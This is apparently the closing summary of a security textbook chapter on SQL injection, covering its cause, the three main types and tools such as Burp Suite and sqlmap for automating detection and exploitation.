In this chapter, we learned about SQL injection vulnerabilities, how to detect them, and how to exploit them. We can conclude with the following points:
- SQL injection vulnerabilities occur due to a lack of input validation.
- To identify a SQL injection bug, enter special characters to generate an error or unexpected behavior.
- There are three main types of SQL injection: in-band, inferential or blind, and out-band.
- You can use the Intruder and Comparer tools, included in Burp Suite, to automate SQL injection identification.
- Using sqlmap, it is possible to automate SQL injection exploitation.